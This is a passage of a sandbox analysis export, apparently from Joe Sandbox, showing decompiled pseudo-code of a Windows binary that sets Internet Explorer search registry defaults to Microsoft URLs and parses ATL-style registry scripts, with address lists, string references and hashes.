                                                                                                                    					_t75 = E0100C684(_t81 - 0x10, L"Search Page", L"http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch", 1);
                                                                                                                    					if(_t75 == 0) {
                                                                                                                    						_t75 = E0100C684(_t81 - 0x10, L"Search Bar", L"http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch", 1);
                                                                                                                    						if(_t75 == 0) {
                                                                                                                    							_t75 = E0100C684(_t81 - 0x10, L"Use Search Asst", L"no", 1);
                                                                                                                    							if(_t75 == 0) {
                                                                                                                    								 *(_t81 - 0x18) = 1;
                                                                                                                    								_t75 = RegSetValueExW( *(_t81 - 0x10), L"Use Custom Search URL", 0, 4, _t81 - 0x18, 4);
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					E0100C53D(_t81 - 0x10);
                                                                                                                    					_t88 = _t75;
                                                                                                                    					if(_t88 == 0) {
                                                                                                                    						L10:
                                                                                                                    						_t76 = E0100C55B(_t81 - 0x10, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Search", 0, 0, 0x2001f, 0, 0);
                                                                                                                    						if(_t76 != 0) {
                                                                                                                    							L15:
                                                                                                                    							if(_t94 > 0) {
                                                                                                                    								_t76 = _t76 & 0x0000ffff | 0x80070000;
                                                                                                                    							}
                                                                                                                    							 *(_t81 - 0x14) = _t76;
                                                                                                                    							L18:
                                                                                                                    							if( *(_t81 - 0x14) < 0) {
                                                                                                                    								goto L26;
                                                                                                                    							}
                                                                                                                    							_t77 = E0100C55B(_t81 - 0x10, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\SearchUrl", 0, 0, 0x2001f, 0, 0);
                                                                                                                    							if(_t77 != 0) {
                                                                                                                    								L23:
                                                                                                                    								if(_t99 > 0) {
                                                                                                                    									_t77 = _t77 & 0x0000ffff | 0x80070000;
                                                                                                                    								}
                                                                                                                    								 *(_t81 - 0x14) = _t77;
                                                                                                                    								goto L26;
                                                                                                                    							}
                                                                                                                    							_t77 = E0100C684(_t81 - 0x10, 0, L"http://home.microsoft.com/access/autosearch.asp?p=%s", 1);
                                                                                                                    							if(_t77 == 0) {
                                                                                                                    								_t77 = E0100C684(_t81 - 0x10, L"provider", L"msn", 1);
                                                                                                                    							}
                                                                                                                    							E0100C53D(_t81 - 0x10);
                                                                                                                    							_t99 = _t77;
                                                                                                                    							if(_t99 == 0) {
                                                                                                                    								goto L26;
                                                                                                                    							} else {
                                                                                                                    								goto L23;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t76 = E0100C684(_t81 - 0x10, L"AutoSearch", L"http://ie.search.msn.com/{SUB_RFC1766}/srchasst/saautosearch.aspx", 1);
                                                                                                                    						if(_t76 == 0) {
                                                                                                                    							_t76 = E0100C684(_t81 - 0x10, L"CustomizeSearch", L"http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm", 1);
                                                                                                                    							if(_t76 == 0) {
                                                                                                                    								_t76 = E0100C684(_t81 - 0x10, L"SearchAssistant", L"http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm", 1);
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						E0100C53D(_t81 - 0x10);
                                                                                                                    						_t94 = _t76;
                                                                                                                    						if(_t94 == 0) {
                                                                                                                    							goto L18;
                                                                                                                    						} else {
                                                                                                                    							goto L15;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					goto L7;
                                                                                                                    				}
                                                                                                                    			}












                                                                                                                    0x01010e59
                                                                                                                    0x01010e59
                                                                                                                    0x01010e60
                                                                                                                    0x01010e67
                                                                                                                    0x01010e6a
                                                                                                                    0x01010e6d
                                                                                                                    0x01010e74
                                                                                                                    0x01010e77
                                                                                                                    0x01011023
                                                                                                                    0x01011026
                                                                                                                    0x01011033
                                                                                                                    0x01011033
                                                                                                                    0x01010e93
                                                                                                                    0x01010e9b
                                                                                                                    0x01010e9f
                                                                                                                    0x01010f16
                                                                                                                    0x01010f16
                                                                                                                    0x01010f1e
                                                                                                                    0x01010f1e
                                                                                                                    0x01010f26
                                                                                                                    0x01010f29
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010ea1
                                                                                                                    0x01010eb6
                                                                                                                    0x01010eba
                                                                                                                    0x01010ecc
                                                                                                                    0x01010ed0
                                                                                                                    0x01010ee8
                                                                                                                    0x01010eec
                                                                                                                    0x01010eff
                                                                                                                    0x01010f08
                                                                                                                    0x01010f08
                                                                                                                    0x01010eec
                                                                                                                    0x01010ed0
                                                                                                                    0x01010f0d
                                                                                                                    0x01010f12
                                                                                                                    0x01010f14
                                                                                                                    0x01010f2f
                                                                                                                    0x01010f4b
                                                                                                                    0x01010f4f
                                                                                                                    0x01010fa7
                                                                                                                    0x01010fa7
                                                                                                                    0x01010faf
                                                                                                                    0x01010faf
                                                                                                                    0x01010fb5
                                                                                                                    0x01010fb8
                                                                                                                    0x01010fbb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010fd4
                                                                                                                    0x01010fd8
                                                                                                                    0x01011012
                                                                                                                    0x01011012
                                                                                                                    0x0101101a
                                                                                                                    0x0101101a
                                                                                                                    0x01011020
                                                                                                                    0x00000000
                                                                                                                    0x01011020
                                                                                                                    0x01010fea
                                                                                                                    0x01010fee
                                                                                                                    0x01011004
                                                                                                                    0x01011004
                                                                                                                    0x01011009
                                                                                                                    0x0101100e
                                                                                                                    0x01011010
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011010
                                                                                                                    0x01010f65
                                                                                                                    0x01010f69
                                                                                                                    0x01010f7f
                                                                                                                    0x01010f83
                                                                                                                    0x01010f99
                                                                                                                    0x01010f99
                                                                                                                    0x01010f83
                                                                                                                    0x01010f9e
                                                                                                                    0x01010fa3
                                                                                                                    0x01010fa5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01010fa5
                                                                                                                    0x00000000
                                                                                                                    0x01010f14

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01010E60
                                                                                                                      • Part of subcall function 01010B31: __EH_prolog3.LIBCMT ref: 01010B38
                                                                                                                      • Part of subcall function 0100C55B: RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 0100C584
                                                                                                                      • Part of subcall function 0100C684: lstrlenW.KERNEL32(00000000), ref: 0100C69F
                                                                                                                      • Part of subcall function 0100C684: RegSetValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0100C6B7
                                                                                                                    • RegSetValueExW.ADVAPI32(?,Use Custom Search URL,00000000,00000004,?,00000004,0000000C), ref: 01010F02
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Internet Explorer\Search, xrefs: 01010F39
                                                                                                                    • Search Page, xrefs: 01010EA9
                                                                                                                    • SearchAssistant, xrefs: 01010F8C
                                                                                                                    • provider, xrefs: 01010FF7
                                                                                                                    • http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch, xrefs: 01010EA3, 01010EBE
                                                                                                                    • Software\Microsoft\Internet Explorer\Main, xrefs: 01010E86
                                                                                                                    • Use Custom Search URL, xrefs: 01010EF7
                                                                                                                    • msn, xrefs: 01010FF2
                                                                                                                    • http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm, xrefs: 01010F6D
                                                                                                                    • http://home.microsoft.com/access/autosearch.asp?p=%s, xrefs: 01010FDC
                                                                                                                    • Search Bar, xrefs: 01010EBF
                                                                                                                    • Use Search Asst, xrefs: 01010EDB
                                                                                                                    • CustomizeSearch, xrefs: 01010F72
                                                                                                                    • http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm, xrefs: 01010F87
                                                                                                                    • Software\Microsoft\Internet Explorer\SearchUrl, xrefs: 01010FC2
                                                                                                                    • AutoSearch, xrefs: 01010F58
                                                                                                                    • http://ie.search.msn.com/{SUB_RFC1766}/srchasst/saautosearch.aspx, xrefs: 01010F53
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3Value$Createlstrlen
                                                                                                                    • String ID: AutoSearch$CustomizeSearch$Search Bar$Search Page$SearchAssistant$Software\Microsoft\Internet Explorer\Main$Software\Microsoft\Internet Explorer\Search$Software\Microsoft\Internet Explorer\SearchUrl$Use Custom Search URL$Use Search Asst$http://home.microsoft.com/access/autosearch.asp?p=%s$http://ie.search.msn.com/{SUB_RFC1766}/srchasst/saautosearch.aspx$http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm$http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm$http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch$msn$provider
                                                                                                                    • API String ID: 3811441507-428694650
                                                                                                                    • Opcode ID: e011f4ff021c6364969040f60b8dcebc4f326af9618f8a9cecb097d1bd4b8a06
                                                                                                                    • Instruction ID: c9a85841fcf569fcd5d360069d0963b317b4f99534134c70db371ef3bb4ee06f
                                                                                                                    • Opcode Fuzzy Hash: e011f4ff021c6364969040f60b8dcebc4f326af9618f8a9cecb097d1bd4b8a06
                                                                                                                    • Instruction Fuzzy Hash: AE410671D40266AAFB33E665CC99EFEB674EBA4B40F11066CF5E17B0C4D9B40E84C690
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E0100F3E3(signed int __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				long _t109;
                                                                                                                    				signed int _t113;
                                                                                                                    				signed int _t116;
                                                                                                                    				long _t118;
                                                                                                                    				long _t123;
                                                                                                                    				signed int _t125;
                                                                                                                    				long _t129;
                                                                                                                    				long _t130;
                                                                                                                    				long _t134;
                                                                                                                    				long _t135;
                                                                                                                    				long _t137;
                                                                                                                    				long _t142;
                                                                                                                    				long _t153;
                                                                                                                    				long _t155;
                                                                                                                    				long _t156;
                                                                                                                    				long _t164;
                                                                                                                    				long _t166;
                                                                                                                    				void* _t189;
                                                                                                                    				void* _t212;
                                                                                                                    				WCHAR* _t214;
                                                                                                                    				void* _t219;
                                                                                                                    				void* _t220;
                                                                                                                    				void* _t221;
                                                                                                                    				long _t222;
                                                                                                                    
                                                                                                                    				_t221 = __eflags;
                                                                                                                    				_t212 = __edx;
                                                                                                                    				_t176 = __ecx;
                                                                                                                    				_t173 = __ebx;
                                                                                                                    				_push(0x42c);
                                                                                                                    				E01008882(E010160BB, __ebx, __edi, __esi);
                                                                                                                    				_t214 =  *(_t219 + 8);
                                                                                                                    				 *(_t219 - 0x42c) =  *(_t219 - 0x42c) & 0x00000000;
                                                                                                                    				 *((intOrPtr*)(_t219 - 0x424)) = __ecx;
                                                                                                                    				 *(_t219 - 0x434) =  *(_t219 + 0xc);
                                                                                                                    				 *(_t219 - 4) =  *(_t219 - 4) & 0x00000000;
                                                                                                                    				 *(_t219 - 0x438) =  *(_t219 + 0x14);
                                                                                                                    				while(1) {
                                                                                                                    					L70:
                                                                                                                    					_t109 = E0100E39F(_t176, _t221, _t214);
                                                                                                                    					_t216 = _t109;
                                                                                                                    					_t222 = _t109;
                                                                                                                    					L71:
                                                                                                                    					while(_t222 >= 0) {
                                                                                                                    						while( *_t214 != 0x7d) {
                                                                                                                    							 *(_t219 - 0x430) = 1;
                                                                                                                    							_t113 = lstrcmpiW(_t214, L"Delete");
                                                                                                                    							asm("sbb ebx, ebx");
                                                                                                                    							_t173 =  ~_t113 + 1;
                                                                                                                    							__eflags = lstrcmpiW(_t214, L"ForceRemove");
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								L3:
                                                                                                                    								_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    								__eflags = _t216;
                                                                                                                    								if(_t216 < 0) {
                                                                                                                    									goto L84;
                                                                                                                    								}
                                                                                                                    								__eflags =  *(_t219 + 0x10);
                                                                                                                    								if( *(_t219 + 0x10) == 0) {
                                                                                                                    									L14:
                                                                                                                    									_t116 = lstrcmpiW(_t214, L"NoRemove");
                                                                                                                    									__eflags = _t116;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										L16:
                                                                                                                    										__eflags = lstrcmpiW(_t214, L"Val");
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											_t118 = E0100E313(_t214, 0x5c);
                                                                                                                    											__eflags = _t118;
                                                                                                                    											if(_t118 != 0) {
                                                                                                                    												L75:
                                                                                                                    												_t216 = 0x80020009;
                                                                                                                    												goto L84;
                                                                                                                    											}
                                                                                                                    											__eflags =  *(_t219 + 0x10) - _t118;
                                                                                                                    											if( *(_t219 + 0x10) == _t118) {
                                                                                                                    												__eflags =  *(_t219 + 0x14);
                                                                                                                    												if( *(_t219 + 0x14) != 0) {
                                                                                                                    													_t173 = 2;
                                                                                                                    												} else {
                                                                                                                    													_t173 = E0100C5B0(_t219 - 0x42c,  *(_t219 - 0x434), _t214, 0x20019);
                                                                                                                    												}
                                                                                                                    												__eflags = _t173;
                                                                                                                    												if(__eflags != 0) {
                                                                                                                    													 *(_t219 + 0x14) = 1;
                                                                                                                    												}
                                                                                                                    												E0100DF74(_t219 - 0x218, _t219 - 0x218, 0x104, _t214, 0xffffffff);
                                                                                                                    												_t220 = _t220 + 0x10;
                                                                                                                    												_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    												__eflags = _t216;
                                                                                                                    												if(_t216 < 0) {
                                                                                                                    													goto L84;
                                                                                                                    												} else {
                                                                                                                    													_t216 = E0100E51B(_t173,  *((intOrPtr*)(_t219 - 0x424)), _t212, _t214);
                                                                                                                    													__eflags = _t216;
                                                                                                                    													if(_t216 < 0) {
                                                                                                                    														goto L84;
                                                                                                                    													}
                                                                                                                    													__eflags =  *_t214 - 0x7b;
                                                                                                                    													if( *_t214 != 0x7b) {
                                                                                                                    														L50:
                                                                                                                    														__eflags = _t173 - 2;
                                                                                                                    														_t123 =  *(_t219 - 0x438);
                                                                                                                    														 *(_t219 + 0x14) = _t123;
                                                                                                                    														if(_t173 == 2) {
                                                                                                                    															continue;
                                                                                                                    														}
                                                                                                                    														__eflags = _t173;
                                                                                                                    														if(_t173 == 0) {
                                                                                                                    															__eflags = _t123;
                                                                                                                    															if(_t123 == 0) {
                                                                                                                    																L59:
                                                                                                                    																 *(_t219 - 0x428) = E0100E4DF( *((intOrPtr*)(_t219 - 0x424)),  *(_t219 - 0x42c));
                                                                                                                    																_t125 = E0100C53D(_t219 - 0x42c);
                                                                                                                    																_t173 = _t125;
                                                                                                                    																__eflags = _t173;
                                                                                                                    																if(_t173 != 0) {
                                                                                                                    																	E0100C53D(_t219 - 0x42c);
                                                                                                                    																	_push(_t173);
                                                                                                                    																	L79:
                                                                                                                    																	E0100DF9B();
                                                                                                                    																	L85:
                                                                                                                    																	return E01008914(_t173, _t214, _t216);
                                                                                                                    																}
                                                                                                                    																__eflags =  *(_t219 - 0x430) - _t125;
                                                                                                                    																if( *(_t219 - 0x430) == _t125) {
                                                                                                                    																	continue;
                                                                                                                    																}
                                                                                                                    																__eflags =  *(_t219 - 0x428) - _t125;
                                                                                                                    																if( *(_t219 - 0x428) != _t125) {
                                                                                                                    																	continue;
                                                                                                                    																}
                                                                                                                    																_t129 = RegDeleteKeyW( *(_t219 - 0x434), _t219 - 0x218);
                                                                                                                    																 *(_t219 - 0x430) =  *(_t219 - 0x430) & _t173;
                                                                                                                    																__eflags = _t129;
                                                                                                                    																if(_t129 != 0) {
                                                                                                                    																	_t130 = E0100DF9B(_t129);
                                                                                                                    																	_t189 = _t219 - 0x430;
                                                                                                                    																	L82:
                                                                                                                    																	_t216 = _t130;
                                                                                                                    																	L83:
                                                                                                                    																	E0100C53D(_t189);
                                                                                                                    																	goto L84;
                                                                                                                    																}
                                                                                                                    																_t189 = _t219 - 0x430;
                                                                                                                    																L64:
                                                                                                                    																E0100C53D(_t189);
                                                                                                                    																L65:
                                                                                                                    																__eflags =  *(_t219 + 0x10);
                                                                                                                    																if( *(_t219 + 0x10) == 0) {
                                                                                                                    																	continue;
                                                                                                                    																}
                                                                                                                    																__eflags =  *_t214 - 0x7b;
                                                                                                                    																if( *_t214 != 0x7b) {
                                                                                                                    																	continue;
                                                                                                                    																}
                                                                                                                    																__eflags = lstrlenW(_t214) - 1;
                                                                                                                    																if(__eflags != 0) {
                                                                                                                    																	continue;
                                                                                                                    																}
                                                                                                                    																_t134 = E0100F3E3(_t173,  *((intOrPtr*)(_t219 - 0x424)), _t212, _t214, _t216, __eflags, _t214,  *(_t219 - 0x42c),  *(_t219 + 0x10), 0);
                                                                                                                    																_t216 = _t134;
                                                                                                                    																__eflags = _t134;
                                                                                                                    																if(__eflags < 0) {
                                                                                                                    																	goto L84;
                                                                                                                    																}
                                                                                                                    																_t176 =  *((intOrPtr*)(_t219 - 0x424));
                                                                                                                    																goto L70;
                                                                                                                    															}
                                                                                                                    															_t135 = E0100E4DF( *((intOrPtr*)(_t219 - 0x424)),  *(_t219 - 0x42c));
                                                                                                                    															__eflags = _t135;
                                                                                                                    															if(_t135 == 0) {
                                                                                                                    																goto L59;
                                                                                                                    															}
                                                                                                                    															_t137 = E0100E4A9(_t219 - 0x218);
                                                                                                                    															__eflags = _t137;
                                                                                                                    															if(_t137 != 0) {
                                                                                                                    																__eflags =  *(_t219 - 0x430);
                                                                                                                    																if( *(_t219 - 0x430) != 0) {
                                                                                                                    																	E0100E6D9(_t219 - 0x42c, _t212, _t219 - 0x218);
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    															continue;
                                                                                                                    														}
                                                                                                                    														__eflags = _t123;
                                                                                                                    														if(_t123 != 0) {
                                                                                                                    															continue;
                                                                                                                    														}
                                                                                                                    														_t216 = E0100DF9B(_t173);
                                                                                                                    														goto L84;
                                                                                                                    													}
                                                                                                                    													__eflags = lstrlenW(_t214) - 1;
                                                                                                                    													if(__eflags != 0) {
                                                                                                                    														goto L50;
                                                                                                                    													}
                                                                                                                    													_t142 = E0100F3E3(_t173,  *((intOrPtr*)(_t219 - 0x424)), _t212, _t214, _t216, __eflags, _t214,  *(_t219 - 0x42c), 0,  *(_t219 + 0x14));
                                                                                                                    													_t216 = _t142;
                                                                                                                    													__eflags = _t142;
                                                                                                                    													if(__eflags >= 0) {
                                                                                                                    														L49:
                                                                                                                    														_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    														__eflags = _t216;
                                                                                                                    														if(_t216 < 0) {
                                                                                                                    															goto L84;
                                                                                                                    														}
                                                                                                                    														goto L50;
                                                                                                                    													}
                                                                                                                    													__eflags =  *(_t219 + 0x14);
                                                                                                                    													if(__eflags == 0) {
                                                                                                                    														goto L84;
                                                                                                                    													}
                                                                                                                    													goto L49;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    											__eflags = E0100C5B0(_t219 - 0x42c,  *(_t219 - 0x434), _t214, 0x2001f);
                                                                                                                    											if(__eflags == 0) {
                                                                                                                    												L35:
                                                                                                                    												_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    												__eflags = _t216;
                                                                                                                    												if(_t216 < 0) {
                                                                                                                    													goto L84;
                                                                                                                    												}
                                                                                                                    												__eflags =  *_t214 - 0x3d;
                                                                                                                    												if(__eflags != 0) {
                                                                                                                    													goto L65;
                                                                                                                    												}
                                                                                                                    												_t216 = E0100F09B( *((intOrPtr*)(_t219 - 0x424)), _t212, __eflags, _t219 - 0x42c, 0, _t214);
                                                                                                                    												L11:
                                                                                                                    												__eflags = _t216;
                                                                                                                    												if(_t216 < 0) {
                                                                                                                    													goto L84;
                                                                                                                    												}
                                                                                                                    												goto L65;
                                                                                                                    											}
                                                                                                                    											__eflags = E0100C5B0(_t219 - 0x42c,  *(_t219 - 0x434), _t214, 0x20019);
                                                                                                                    											if(__eflags == 0) {
                                                                                                                    												goto L35;
                                                                                                                    											}
                                                                                                                    											_t173 = 0;
                                                                                                                    											_t216 = E0100C55B(_t219 - 0x42c,  *(_t219 - 0x434), _t214, 0, 0, 0x2001f, 0, 0);
                                                                                                                    											__eflags = _t216;
                                                                                                                    											if(__eflags != 0) {
                                                                                                                    												E0100C53D(_t219 - 0x42c);
                                                                                                                    												_push(_t216);
                                                                                                                    												goto L79;
                                                                                                                    											}
                                                                                                                    											goto L35;
                                                                                                                    										}
                                                                                                                    										_t153 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t219 - 0x420);
                                                                                                                    										_t216 = _t153;
                                                                                                                    										_t173 = 0;
                                                                                                                    										__eflags = _t153;
                                                                                                                    										if(__eflags < 0) {
                                                                                                                    											goto L84;
                                                                                                                    										}
                                                                                                                    										_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    										__eflags = _t216;
                                                                                                                    										if(_t216 < 0) {
                                                                                                                    											goto L84;
                                                                                                                    										}
                                                                                                                    										__eflags =  *_t214 - 0x3d;
                                                                                                                    										if( *_t214 != 0x3d) {
                                                                                                                    											goto L75;
                                                                                                                    										}
                                                                                                                    										__eflags =  *(_t219 + 0x10);
                                                                                                                    										if(__eflags == 0) {
                                                                                                                    											__eflags =  *(_t219 + 0x14);
                                                                                                                    											if( *(_t219 + 0x14) != 0) {
                                                                                                                    												L29:
                                                                                                                    												_t155 = E0100E51B(_t173,  *((intOrPtr*)(_t219 - 0x424)), _t212, _t214);
                                                                                                                    												_t216 = _t155;
                                                                                                                    												__eflags = _t155 - _t173;
                                                                                                                    												goto L71;
                                                                                                                    											}
                                                                                                                    											__eflags =  *(_t219 - 0x430);
                                                                                                                    											if( *(_t219 - 0x430) == 0) {
                                                                                                                    												goto L29;
                                                                                                                    											}
                                                                                                                    											 *(_t219 - 0x428) = 0;
                                                                                                                    											_t156 = E0100C5B0(_t219 - 0x428,  *(_t219 - 0x434), 0, 0x20006);
                                                                                                                    											__eflags = _t156;
                                                                                                                    											if(_t156 != 0) {
                                                                                                                    												L77:
                                                                                                                    												_t130 = E0100DF9B(_t156);
                                                                                                                    												_t189 = _t219 - 0x428;
                                                                                                                    												goto L82;
                                                                                                                    											}
                                                                                                                    											_t156 = RegDeleteValueW( *(_t219 - 0x428), _t219 - 0x420);
                                                                                                                    											__eflags = _t156;
                                                                                                                    											if(_t156 == 0) {
                                                                                                                    												L28:
                                                                                                                    												E0100C53D(_t219 - 0x428);
                                                                                                                    												goto L29;
                                                                                                                    											}
                                                                                                                    											__eflags = _t156 - 2;
                                                                                                                    											if(_t156 != 2) {
                                                                                                                    												goto L77;
                                                                                                                    											}
                                                                                                                    											goto L28;
                                                                                                                    										}
                                                                                                                    										 *(_t219 - 0x430) =  *(_t219 - 0x434);
                                                                                                                    										 *(_t219 - 4) = 1;
                                                                                                                    										_t216 = E0100F09B( *((intOrPtr*)(_t219 - 0x424)), _t212, __eflags, _t219 - 0x430, _t219 - 0x420, _t214);
                                                                                                                    										__eflags = _t216;
                                                                                                                    										 *(_t219 - 0x430) = 0;
                                                                                                                    										_t189 = _t219 - 0x430;
                                                                                                                    										if(_t216 < 0) {
                                                                                                                    											goto L83;
                                                                                                                    										}
                                                                                                                    										 *(_t219 - 4) = 0;
                                                                                                                    										goto L64;
                                                                                                                    									}
                                                                                                                    									 *(_t219 - 0x430) =  *(_t219 - 0x430) & _t116;
                                                                                                                    									_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    									__eflags = _t216;
                                                                                                                    									if(_t216 < 0) {
                                                                                                                    										goto L84;
                                                                                                                    									}
                                                                                                                    									goto L16;
                                                                                                                    								}
                                                                                                                    								 *(_t219 - 0x428) =  *(_t219 - 0x428) & 0x00000000;
                                                                                                                    								_t164 = E0100E313(_t214, 0x5c);
                                                                                                                    								__eflags = _t164;
                                                                                                                    								if(_t164 != 0) {
                                                                                                                    									E0100C53D(_t219 - 0x428);
                                                                                                                    									goto L75;
                                                                                                                    								}
                                                                                                                    								_t166 = E0100E4A9(_t214);
                                                                                                                    								__eflags = _t166;
                                                                                                                    								if(_t166 != 0) {
                                                                                                                    									 *(_t219 - 0x428) =  *(_t219 - 0x434);
                                                                                                                    									E0100E6D9(_t219 - 0x428, _t212, _t214);
                                                                                                                    									_t20 = _t219 - 0x428;
                                                                                                                    									 *_t20 =  *(_t219 - 0x428) & 0x00000000;
                                                                                                                    									__eflags =  *_t20;
                                                                                                                    								}
                                                                                                                    								__eflags = _t173;
                                                                                                                    								if(__eflags == 0) {
                                                                                                                    									E0100C53D(_t219 - 0x428);
                                                                                                                    									goto L14;
                                                                                                                    								}
                                                                                                                    								_t216 = E0100E39F( *((intOrPtr*)(_t219 - 0x424)), __eflags, _t214);
                                                                                                                    								__eflags = _t216;
                                                                                                                    								if(_t216 < 0) {
                                                                                                                    									_t189 = _t219 - 0x428;
                                                                                                                    									goto L83;
                                                                                                                    								}
                                                                                                                    								_t216 = E0100E51B(_t173,  *((intOrPtr*)(_t219 - 0x424)), _t212, _t214);
                                                                                                                    								E0100C53D(_t219 - 0x428);
                                                                                                                    								goto L11;
                                                                                                                    							}
                                                                                                                    							__eflags = _t173;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								goto L14;
                                                                                                                    							}
                                                                                                                    							goto L3;
                                                                                                                    						}
                                                                                                                    						break;
                                                                                                                    					}
                                                                                                                    					L84:
                                                                                                                    					E0100C53D(_t219 - 0x42c);
                                                                                                                    					goto L85;
                                                                                                                    				}
                                                                                                                    			}



























                                                                                                                    0x0100f3e3
                                                                                                                    0x0100f3e3
                                                                                                                    0x0100f3e3
                                                                                                                    0x0100f3e3
                                                                                                                    0x0100f3e3
                                                                                                                    0x0100f3ed
                                                                                                                    0x0100f3f5
                                                                                                                    0x0100f3f8
                                                                                                                    0x0100f3ff
                                                                                                                    0x0100f405
                                                                                                                    0x0100f40e
                                                                                                                    0x0100f412
                                                                                                                    0x0100f8d3
                                                                                                                    0x0100f8d3
                                                                                                                    0x0100f8d4
                                                                                                                    0x0100f8d9
                                                                                                                    0x0100f8db
                                                                                                                    0x00000000
                                                                                                                    0x0100f8dd
                                                                                                                    0x0100f8df
                                                                                                                    0x0100f429
                                                                                                                    0x0100f433
                                                                                                                    0x0100f43e
                                                                                                                    0x0100f441
                                                                                                                    0x0100f444
                                                                                                                    0x0100f446
                                                                                                                    0x0100f450
                                                                                                                    0x0100f45c
                                                                                                                    0x0100f45e
                                                                                                                    0x0100f460
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f466
                                                                                                                    0x0100f46a
                                                                                                                    0x0100f501
                                                                                                                    0x0100f507
                                                                                                                    0x0100f50d
                                                                                                                    0x0100f50f
                                                                                                                    0x0100f52d
                                                                                                                    0x0100f539
                                                                                                                    0x0100f53b
                                                                                                                    0x0100f641
                                                                                                                    0x0100f646
                                                                                                                    0x0100f648
                                                                                                                    0x0100f8f6
                                                                                                                    0x0100f8f6
                                                                                                                    0x00000000
                                                                                                                    0x0100f8f6
                                                                                                                    0x0100f64e
                                                                                                                    0x0100f651
                                                                                                                    0x0100f6ed
                                                                                                                    0x0100f6f1
                                                                                                                    0x0100f710
                                                                                                                    0x0100f6f3
                                                                                                                    0x0100f70a
                                                                                                                    0x0100f70a
                                                                                                                    0x0100f711
                                                                                                                    0x0100f713
                                                                                                                    0x0100f715
                                                                                                                    0x0100f715
                                                                                                                    0x0100f72b
                                                                                                                    0x0100f736
                                                                                                                    0x0100f73f
                                                                                                                    0x0100f741
                                                                                                                    0x0100f743
                                                                                                                    0x00000000
                                                                                                                    0x0100f749
                                                                                                                    0x0100f755
                                                                                                                    0x0100f757
                                                                                                                    0x0100f759
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f75f
                                                                                                                    0x0100f763
                                                                                                                    0x0100f7ae
                                                                                                                    0x0100f7ae
                                                                                                                    0x0100f7b1
                                                                                                                    0x0100f7b7
                                                                                                                    0x0100f7ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f7c0
                                                                                                                    0x0100f7c2
                                                                                                                    0x0100f7d9
                                                                                                                    0x0100f7db
                                                                                                                    0x0100f830
                                                                                                                    0x0100f847
                                                                                                                    0x0100f84d
                                                                                                                    0x0100f852
                                                                                                                    0x0100f854
                                                                                                                    0x0100f856
                                                                                                                    0x0100f92c
                                                                                                                    0x0100f931
                                                                                                                    0x0100f91f
                                                                                                                    0x0100f91f
                                                                                                                    0x0100f954
                                                                                                                    0x0100f959
                                                                                                                    0x0100f959
                                                                                                                    0x0100f85c
                                                                                                                    0x0100f862
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f864
                                                                                                                    0x0100f86a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f879
                                                                                                                    0x0100f87f
